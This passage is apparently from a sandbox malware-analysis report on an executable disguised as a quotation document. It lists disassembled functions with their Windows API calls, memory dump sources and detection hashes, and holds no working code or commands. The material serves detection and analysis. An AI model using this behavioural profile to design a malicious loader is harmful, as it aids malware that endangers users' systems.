                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268545403-0
                                                                                                                  • Opcode ID: eb5773ce100a228f7d6c6f9b500da6b4a14b0d9e86028ae0c381d0da68d9132d
                                                                                                                  • Instruction ID: d75397adebe6b72aac222d7016f73a72aa9bff69debd8a00f8569d50231a3841
                                                                                                                  • Opcode Fuzzy Hash: eb5773ce100a228f7d6c6f9b500da6b4a14b0d9e86028ae0c381d0da68d9132d
                                                                                                                  • Instruction Fuzzy Hash: 49E04F767101049BCB24CF94EE9087E73F6EBC4311364093ED502B3291CA78AD018A28
                                                                                                                  Function 004067C6 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000000,?,00403613,0000000C), ref: 004067D8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004067F3
                                                                                                                    • Part of subcall function 00406758: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040676F
                                                                                                                    • Part of subcall function 00406758: wsprintfA.USER32 ref: 004067A8
                                                                                                                    • Part of subcall function 00406758: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004067BC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2547128583-0
                                                                                                                  • Opcode ID: d21155a8e253951b1807020726629df3aa91f7e4109fffff5a8a71fd9d99dec7
                                                                                                                  • Instruction ID: 52a9d0ce7e6ef5a0295f6311000fc2a6eba14747806be4ddd5c9686f534873ad
                                                                                                                  • Opcode Fuzzy Hash: d21155a8e253951b1807020726629df3aa91f7e4109fffff5a8a71fd9d99dec7
                                                                                                                  • Instruction Fuzzy Hash: 76E086325042115BD61177749E44C37A7A8AEC8704302083EF552F3140DB38DC32A669
                                                                                                                  Function 00405F31 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402FA4,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405F35
                                                                                                                  • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F57
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 415043291-0
                                                                                                                  • Opcode ID: 4b81b148e8691c58bd2a360e443e4ee544bc9685a9596e96fbb344e13ad99358
                                                                                                                  • Instruction ID: dec33779a3bbcace5fa9dc55a7fc16cefb125d2d487a635038e5798c5dd80b18
                                                                                                                  • Opcode Fuzzy Hash: 4b81b148e8691c58bd2a360e443e4ee544bc9685a9596e96fbb344e13ad99358
                                                                                                                  • Instruction Fuzzy Hash: 61D09E31254301AFEF099F20DE16F2E7BA2EB94B00F11953CB686940E0DA7158599B15
                                                                                                                  Function 00405A02 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004034C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00405A08
                                                                                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405A16
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1375471231-0
                                                                                                                  • Opcode ID: d9dda82da09fb7893b44e586d5b2745d7b8b94a6c082c699b781b15152cb1a79
                                                                                                                  • Instruction ID: d91517c9ec7ca00b0c6db103ac34d5d99a7775c336e666adccf6ab19fde79bc4
                                                                                                                  • Opcode Fuzzy Hash: d9dda82da09fb7893b44e586d5b2745d7b8b94a6c082c699b781b15152cb1a79
                                                                                                                  • Instruction Fuzzy Hash: 3BC04C307545019AEA106B30BE48F1B7A60EB94741F158539A146F11E0DA348455DD2D
                                                                                                                  Function 0040267A Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2111968516-0
                                                                                                                  • Opcode ID: 3c9335e32cd9daf42561c6fce3866d1bdb6228664f73f3cf624554f77a695d8d
                                                                                                                  • Instruction ID: e10e2f1ea919eba655f0f636737b0de571c8d5ca96f62e754dabbe4af478ff8f
                                                                                                                  • Opcode Fuzzy Hash: 3c9335e32cd9daf42561c6fce3866d1bdb6228664f73f3cf624554f77a695d8d
                                                                                                                  • Instruction Fuzzy Hash: DD21C7B0D04289EEDF228FA886446EEBBB09F45314F14407FE591B73D1C5BC8985CB69
                                                                                                                  Function 00402738 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402756
                                                                                                                    • Part of subcall function 004062FC: wsprintfA.USER32 ref: 00406309
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointerwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 327478801-0
                                                                                                                  • Opcode ID: d640c90d5d2edff6f116a7c9ae8c65dc2ab5f4425bf4f93b9f2e7f3455d18805
                                                                                                                  • Instruction ID: 01700e84e56ffba90cb4f84c4883ab7776ea42308372cd50e7f631d7e9e7607c
                                                                                                                  • Opcode Fuzzy Hash: d640c90d5d2edff6f116a7c9ae8c65dc2ab5f4425bf4f93b9f2e7f3455d18805
                                                                                                                  • Instruction Fuzzy Hash: 4CE09272B00108BED710EF94AE8A9BE7668EBC0319B24043FF102F10D2CA7848529A3D
                                                                                                                  Function 00406252 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CEF,00000000,?,?), ref: 0040627B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Create
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2289755597-0
                                                                                                                  • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                  • Instruction ID: 8c878865fe06970d963de382318c64beefa5439936e1a4c8c7b138c4246cd1ec
                                                                                                                  • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                  • Instruction Fuzzy Hash: 65E0E6B2110109BEEF096F50DD0AD7B3B1DE704310F01452EF917E4091E6B5E9315774
                                                                                                                  Function 00405FD8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,00413391,0040B8F8,0040340A,0040B8F8,00413391,004138F8,00004000,?,00000000,00403234,00000004), ref: 00405FEC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                                                                  • Instruction ID: 88ab67f312457d28b8baaa4f93e532bb83838a58747795b440e037e63a043381
                                                                                                                  • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                                                                  • Instruction Fuzzy Hash: 5EE08C3224021AABEF50DE608C04FEB3B6CEB00364F018833F916E2140DA30E92087A8
                                                                                                                  Function 00405FA9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,004138F8,0040B8F8,00403486,0000000A,0000000A,0040338A,004138F8,00004000,?,00000000,00403234), ref: 00405FBD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 3e41ba515afca3f1236dcbdd5ecaa7d7c9f36d209571132ddb966e5623deb938
                                                                                                                  • Instruction ID: 3bd95e8061a668c1fc5f3b4420994b9f1a6e81f617005d9b509494914c6c3840
                                                                                                                  • Opcode Fuzzy Hash: 3e41ba515afca3f1236dcbdd5ecaa7d7c9f36d209571132ddb966e5623deb938
                                                                                                                  • Instruction Fuzzy Hash: F5E0EC3225025AABDF109E659C00EEB7B6DEB053A1F104836F915E2190E635E821DBB5
                                                                                                                  Function 6D4329B1 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNELBASE(6D43504C,00000004,00000040,6D43503C), ref: 6D4329CF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: bb2667d100071be377716f7d3a7106ec86c9640b8d914ab783ee38e50d7e7861
                                                                                                                  • Instruction ID: 20b9fda836c470d074dfb883a0267115051b706b1bb0eb888ec552101341642d
                                                                                                                  • Opcode Fuzzy Hash: bb2667d100071be377716f7d3a7106ec86c9640b8d914ab783ee38e50d7e7861
                                                                                                                  • Instruction Fuzzy Hash: 95F098B8504280DECB70EF2E8484B293BF0B71A354B23452AE148D624AE3368844CF91
                                                                                                                  Function 00406224 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004062B2,?,?,?,?,00000000,?), ref: 00406248
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                  • Instruction ID: 5d61f869b47ee4b70f95b423005ac0773cf63111af4091b71d63a2b6add492bf
                                                                                                                  • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                  • Instruction Fuzzy Hash: AFD0123210020DBBDF116E90DD01FAB3B1DAB08310F014426FE56F4091D776D530A755
                                                                                                                  Function 004015A2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015AD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 1c732426b319a58644122993fcc2576965abff77efdecfc0694fb1aac6d17fc3
                                                                                                                  • Instruction ID: 2ce252bcc0e07c2527f9a84e186676ee684579022271b57a4bdaa86ebf38a2c9
                                                                                                                  • Opcode Fuzzy Hash: 1c732426b319a58644122993fcc2576965abff77efdecfc0694fb1aac6d17fc3
                                                                                                                  • Instruction Fuzzy Hash: 37D01232714208DBDB20DFE49B08AAE7264EB50325B30453BD111F21D1D6B885515B2D
                                                                                                                  Function 0040448A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(0001042E,00000000,00000000,00000000), ref: 0040449C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 37940b9a954cc0beeea48ed3718007fd9bc4adbe4b3dec467c0c297cf82f7324
                                                                                                                  • Instruction ID: 6ff1abb975ac347c442c3e3776af760808175e1253c44823179a2e71a1869973
                                                                                                                  • Opcode Fuzzy Hash: 37940b9a954cc0beeea48ed3718007fd9bc4adbe4b3dec467c0c297cf82f7324
                                                                                                                  • Instruction Fuzzy Hash: CDC04CB17402017ADA209F659E45F067764A750711F5484697344E51D4C678E810D62C
                                                                                                                  Function 00404473 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(00000028,?,?,004042A3), ref: 00404481
                                                                                                                  Memory Dump Source
